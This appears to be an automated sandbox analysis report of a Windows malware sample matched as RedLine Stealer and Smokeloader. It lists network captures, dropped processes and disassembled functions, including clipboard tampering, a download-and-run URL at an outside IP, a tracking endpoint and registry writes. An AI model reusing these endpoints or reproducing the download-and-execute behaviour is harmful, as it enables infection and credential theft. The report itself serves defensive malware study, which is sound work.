2025-01-04 14:33:35 UTC	15331	OUT	Data Raw: 2d 2d 36 5a 56 53 33 48 4d 5a 4b 36 45 46 32 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 38 33 46 33 35 45 37 34 36 31 42 31 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 36 5a 56 53 33 48 4d 5a 4b 36 45 46 32 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 5a 56 53 33 48 4d 5a 4b 36 45 46 32 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 36 5a 56 53 33 48 4d 5a 4b 36 45 46 32 Data Ascii: --6ZVS3HMZK6EF2EContent-Disposition: form-data; name="hwid"A083F35E7461B14A822D1F4978021086--6ZVS3HMZK6EF2EContent-Disposition: form-data; name="pid"3--6ZVS3HMZK6EF2EContent-Disposition: form-data; name="lid"4h5VfH----6ZVS3HMZK6EF2
2025-01-04 14:33:35 UTC	4882	OUT	Data Raw: 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: #a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
2025-01-04 14:33:35 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 14:33:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=voc3odu2m6rlad81d1ap91uge3; expires=Wed, 30 Apr 2025 08:20:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yw7jZhy6WdfvRURavUEV7xVA%2BQ2Fs3QVb8%2FNVi6jMuKBVQ%2FrTwE3uEdSGR9vyy3VWdilJ9uhW1Z9UY0UG0hA4ZGABXiutxvbFjr7BRAcf5fOolDg%2Bf%2FoomVeYqCHWixcPgW5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fcbf1cb0bd88cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1975&rtt_var=741&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21171&delivery_rate=1475492&cwnd=242&unsent_bytes=0&cid=f9a972a9eaf54b38&ts=627&x=0"
2025-01-04 14:33:35 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 14:33:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:33:16
Start date:	04/01/2025
Path:	C:\Users\user\Desktop\J18zxRjOes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\J18zxRjOes.exe"
Imagebase:	0x400000
File size:	371'712 bytes
MD5 hash:	75A2DAFF1EA8532D28CFBA008DE10A40
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3948087329.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	09:33:26
Start date:	04/01/2025
Path:	C:\Users\user\AppData\Local\Temp\628E.tmp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\628E.tmp.exe"
Imagebase:	0x400000
File size:	324'096 bytes
MD5 hash:	7A3E26158D0BF299838749875FEB6232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1736228708.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1730668845.000000000054A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:33:35
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 1796
Imagebase:	0x560000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	20.5%
Signature Coverage:	5.7%
Total number of Nodes:	760
Total number of Limit Nodes:	20

Executed Functions

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 004016E6
Sleep.KERNEL32(00001541,0000004C), ref: 004016F0

Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27

OpenClipboard.USER32(00000000), ref: 0040171D
GetClipboardData.USER32(00000001), ref: 0040172D
GlobalLock.KERNEL32(00000000), ref: 0040173C
_strlen.LIBCMT ref: 00401749
_strlen.LIBCMT ref: 00401778
_strlen.LIBCMT ref: 004018BC
EmptyClipboard.USER32 ref: 004018D2
GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
GlobalLock.KERNEL32(00000000), ref: 004018FD
GlobalUnlock.KERNEL32(00000000), ref: 00401909
SetClipboardData.USER32(00000001,00000000), ref: 00401912
GlobalFree.KERNEL32(00000000), ref: 00401919
CloseClipboard.USER32 ref: 0040193D
Sleep.KERNEL32(000002D2), ref: 00401948

Strings

i, xrefs: 00401759

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
String ID: i
API String ID: 1583243082-3865851505
Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
CloseHandle.KERNEL32(00000000), ref: 00402B07
ShellExecuteExW.SHELL32(?), ref: 00402B68
WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
CloseHandle.KERNEL32(?), ref: 00402B89
InternetCloseHandle.WININET(00000000), ref: 00402B92
InternetCloseHandle.WININET(00000000), ref: 00402B95

Strings

.exe, xrefs: 00402A6B
<, xrefs: 00402B45
ShareScreen, xrefs: 00402A12

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: .exe$<$ShareScreen
API String ID: 3323492106-493228180
Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4

Function 005F07A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005F07CE
Module32First.KERNEL32(00000000,00000224), ref: 005F07EE

Memory Dump Source

Source File: 00000000.00000002.3948087329.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: ce13af51a5bc28e3279e9c9736f30fdf45294fe70e0ae3af8c6bcaa211608e82
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: ADF0C2311023196BD7203AB5A88CA7FBAE8FF49725F141168E742910C1DA78F8054A60

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27

GetLastError.KERNEL32 ref: 0043D150
__dosmaperr.LIBCMT ref: 0043D157
GetFileType.KERNEL32(00000000), ref: 0043D163
GetLastError.KERNEL32 ref: 0043D16D
__dosmaperr.LIBCMT ref: 0043D176
CloseHandle.KERNEL32(00000000), ref: 0043D196
CloseHandle.KERNEL32(?), ref: 0043D2E0
GetLastError.KERNEL32 ref: 0043D312
__dosmaperr.LIBCMT ref: 0043D319

Strings

H, xrefs: 0043D29E

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

Function 0063003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0063024D

Strings

kernel32.dll, xrefs: 0063008F, 00630095
cess, xrefs: 0063018D

Memory Dump Source

Source File: 00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_J18zxRjOes.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 8f69342a498a25bf33f9362e99804d6d805f6cc08e10f7a952bbbdd345a8224a
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: AF527874A00229DFDB64CF58C995BA8BBB1BF09314F1480D9E90DAB351DB30AE89DF54

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
InternetCloseHandle.WININET(00000000), ref: 00402E4B
InternetCloseHandle.WININET(00000000), ref: 00402E4E

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 00402C57, 00402D83, 00402DF2
ShareScreen, xrefs: 00402C22
&cc=DE, xrefs: 00402DB4, 00402DBA, 00402E17

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Internet$CloseHandleOpen_wcslen
String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
API String ID: 3067768807-1501832161
Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Cnd_init.LIBCPMT ref: 004051E4
__Mtx_init.LIBCPMT ref: 0040520A
std::_Cnd_initX.LIBCPMT ref: 0040522D
__Thrd_start.LIBCPMT ref: 00405252
std::_Cnd_waitX.LIBCPMT ref: 00405272
std::_Cnd_initX.LIBCPMT ref: 0040529F

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Cnd_initX.LIBCPMT ref: 0040581C
__Cnd_signal.LIBCPMT ref: 00405828
std::_Cnd_initX.LIBCPMT ref: 0040583D
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorExitLastThread
String ID: F(@
API String ID: 1611280651-2698495834
Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
__dosmaperr.LIBCMT ref: 0042E170

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
__dosmaperr.LIBCMT ref: 0043479F

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: CloseCreateValue
String ID:
API String ID: 1818849710-0
Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC

ExitThread.KERNEL32 ref: 0042E086
CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
String ID:
API String ID: 1198197534-0
Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
PostQuitMessage.USER32(00000000), ref: 00402563

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: MessagePostProcQuitWindow
String ID:
API String ID: 3873111417-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001D1B), ref: 00401562

Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD

Strings

http://176.113.115.19/ScreenUpdateSync.exe, xrefs: 0040156D, 004016A6

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: _wcslen$Sleep
String ID: http://176.113.115.19/ScreenUpdateSync.exe
API String ID: 3358372957-3120454669
Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E

Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040298F
__fassign.LIBCMT ref: 0040299F

Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906

Memory Dump Source

Source File: 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_J18zxRjOes.jbxd

Similarity

API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
String ID:
API String ID: 2843524283-0
Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8

Function 00630E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,00630223,?,?), ref: 00630E19
SetErrorMode.KERNEL32(00000000,?,?,00630223,?,?), ref: 00630E1E

Memory Dump Source

